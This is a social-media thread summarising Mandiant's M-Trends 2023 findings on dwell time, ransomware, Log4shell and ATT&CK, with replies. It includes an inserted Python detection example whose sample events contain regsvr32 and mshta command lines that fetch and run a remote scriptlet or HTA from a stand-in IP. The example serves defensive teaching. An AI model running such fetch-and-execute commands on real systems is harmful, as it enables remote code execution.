Things I found interesting in Mandiant's M-Trends 2023 report, a thread. This is their yearly report on cybersecurity.

Direct link to PDF, to avoid the sales lead generator: https://mandiant.widen.net/s/dlzgn6w26n/m-trends-2023

For starters - dwell time - how long orgs take to detect incidents - is at its lowest ever, at 16 days (13 days for internal incidents).

"Improvements in global median dwell time in 2022, regardless of detection source, enabled organizations to respond to incidents faster than ever before."

You can see a clear trend in dwell time over the past decade - some orgs are finally getting to the place where they can respond to incidents a few weeks after they begin.

The report highlights the dwell time for ransomware in 2022 was 9 days.

I realise this conflicts with the press headlines that 'OMG org wide ransomware in 30 minutes!!1!', but those headlines are bullshit by vendors designed to scare you - both the data and first-hand experience tell you ransomware groups almost always spend over a week on lateral movement and exfil before ransomware deployment. You can catch and evict them during that window.

40% of intrusions Mandiant looked at involved data theft, up from 29% the year prior.

Anybody in the trenches knows this one - once those ransomware/not-ransomware boys show up, they steal stuff and sell it later or try to extort you. The cycle of monetisation, basically.

Log4shell was used in 16% of investigations, representing nearly half of all exploits in real world security incidents. Yes, years later, orgs still haven't updated Log4j - I know the industry thinks I overhyped Log4shell, but... well... look at the data.

"Of all threat groups observed in 2022, Mandiant assessed that 48% of these threat groups to have financially motivated operations, "

Follow the money.

In terms of frequently seen malware in real world incidents, Qakbot and SystemBC still sit right up there unsurprisingly.

"This likely reflects the increased usage of malware like SYSTEMBC which is used heavily by actors who deploy ransomware."

BEACON is Mandiant's polite way of saying CobaltStrike.

There's very clear evidence that, if you have the money, mapping your defence to MITRE ATT&CK and going for high risk techniques pays off.

Mandiant have a section on LAPSUS$.

See how LAPSUS$ walked in through the front door by MFA bombing to bypass zero trust (something which Mandiant leave out somehow, hire me pls), then go absolutely crazy when internal by living off the land.

On Black Basta, Mandiant link it to Conti - which would be right. They're even reusing Conti infrastructure (not mentioned).

I completely skipped the nation state APT stuff in the Mandiant M-Trends report as nobody got time for that in 2023.

Btw, one big positive is if the dwell time reduction trend continues, in about 5-10 years it might catch up with ransomware dwell time for many incidents.

My big takeaway for the year is... cyber defence works, you just have to get on with it.

@GossiTheDog Cyber defence works, yes, but the issue is the higher-ups a lot of times don't want to spend the time / money to do it because it's "not important".

A company I recently worked for got hit with ransomware last year, took out 90% of their infra in a weekend, but before then most of the IT team simply didn't give two about, say, patching; they actively turned off update services, ran out of date software, because it was too much work and could cost downtime.

It wasn't until they got hit, and realised the shit show they were in, that cyber defence pays, so after paying contracting companies untold amounts of money to get them sorted.

A lot of orgs don't care until it hits them where it hurts, aka the wallet.

@GossiTheDog

There is a slight problem with this when we are talking about "techniques". There are hundreds of ways to utilize certain techniques in ATT&CK, and without guidance, it is easy to miss a large number of them.

It is difficult to say we detect "Signed Binary Proxy Execution" in totality using purely ATT&CK.

To that end, ATT&CK feels like a starting point.
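To make the point in this reply (and the earlier one about mapping defence to ATT&CK high-risk techniques) concrete, here is an added example that is not from the thread or the report: a toy detection pass over constructed process-creation events for three variants of T1218 (Signed/System Binary Proxy Execution), plus a count of how many of that technique's sub-techniques the rules actually touch. The event format, host names and the `198.51.100.7` address are constructed for the example; the sub-technique IDs are MITRE's.

```python
"""Added example (not from the thread or the M-Trends report): detect a few
T1218 variants in constructed process-creation events and report how much of
the technique's sub-technique list those rules cover."""
import json
import re

# T1218 sub-techniques as published by MITRE ATT&CK (check the current matrix
# for additions; .006 was deprecated and is not listed).
T1218_SUBTECHNIQUES = {
    "T1218.001": "Compiled HTML File",
    "T1218.002": "Control Panel",
    "T1218.003": "CMSTP",
    "T1218.004": "InstallUtil",
    "T1218.005": "Mshta",
    "T1218.007": "Msiexec",
    "T1218.008": "Odbcconf",
    "T1218.009": "Regsvcs/Regasm",
    "T1218.010": "Regsvr32",
    "T1218.011": "Rundll32",
    "T1218.012": "Verclsid",
    "T1218.013": "Mavinject",
    "T1218.014": "MMC",
}


def _image_is(event, exe):
    return event["image"].lower().replace("\\", "/").endswith("/" + exe)


# Each rule: (sub-technique id, rule name, predicate). These are narrow,
# signature-style checks in the spirit of public Sigma rules; they cover only
# a handful of the ways each binary can be abused.
RULES = [
    ("T1218.010", "regsvr32 pulling a scriptlet via /i:",
     lambda e: _image_is(e, "regsvr32.exe")
     and re.search(r"/i:\S*(https?://|\.sct)", e["cmd"], re.I) is not None),
    ("T1218.005", "mshta given inline script or a remote URL",
     lambda e: _image_is(e, "mshta.exe")
     and re.search(r"(javascript:|vbscript:|https?://)", e["cmd"], re.I) is not None),
    ("T1218.011", "rundll32 given inline javascript",
     lambda e: _image_is(e, "rundll32.exe") and "javascript:" in e["cmd"].lower()),
]

# Constructed sample events (one JSON object per line), not real telemetry.
SAMPLE_EVENTS = r"""
{"host":"ws01","image":"C:\\Windows\\System32\\regsvr32.exe","cmd":"regsvr32.exe /s C:\\Program Files\\Vendor\\lib.dll"}
{"host":"ws02","image":"C:\\Windows\\System32\\regsvr32.exe","cmd":"regsvr32.exe /s /n /u /i:http://198.51.100.7/a.sct scrobj.dll"}
{"host":"ws03","image":"C:\\Windows\\System32\\mshta.exe","cmd":"mshta.exe http://198.51.100.7/page.hta"}
{"host":"ws04","image":"C:\\Windows\\System32\\rundll32.exe","cmd":"rundll32.exe shell32.dll,Control_RunDLL"}
"""


def parse_events(text):
    """Parse newline-delimited JSON events, skipping blank lines."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def detect(events, rules=RULES):
    """Return (host, sub-technique id, rule name) for every rule that fires."""
    hits = []
    for event in events:
        for sub_id, name, predicate in rules:
            if predicate(event):
                hits.append((event["host"], sub_id, name))
    return hits


def coverage(rules=RULES, subs=T1218_SUBTECHNIQUES):
    """How many distinct sub-techniques the rule set touches vs. how many exist."""
    covered = {sub_id for sub_id, _, _ in rules}
    return len(covered & set(subs)), len(subs)


if __name__ == "__main__":
    for host, sub_id, name in detect(parse_events(SAMPLE_EVENTS)):
        print(f"{host}: {sub_id} ({T1218_SUBTECHNIQUES[sub_id]}) - {name}")
    hit, total = coverage()
    print(f"rules touch {hit} of {total} T1218 sub-techniques (and only some variants of those)")
```

The coverage number is the honest part of the output: three rules touch three of thirteen sub-techniques, and even for those three they only match the command-line shapes written into the regexes. That is the gap the reply describes, and it is why a technique-level tick box ("we detect T1218") says little without the per-variant detail behind it.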

@GossiTheDog That sounds hard. Can't I just check some boxes or something?

@GossiTheDog I wonder if using MITRE ATT&CK is a sign of a mature org, or if orgs use it to become more mature? I.e. which way round is the causality? Can execs mandate it and reasonably expect some measurable decrease in odds or impact of a security incident?

@GossiTheDog
JUST 50%?

And people wonder why I want cryptocurrency to die in a fire...

Log4j Updates and Vulnerability Resources | Sonatype

The wave of security vulnerabilities and exploitation affecting Log4shell continues to be a serious concern. We developed a one stop shop of Log4j resources.

@GossiTheDog A troubling trend I'm seeing is virtual appliances that have old log4j on them but people are afraid of updating. (Or even don't know it's there and the vendor isn't being proactive about notifying them.)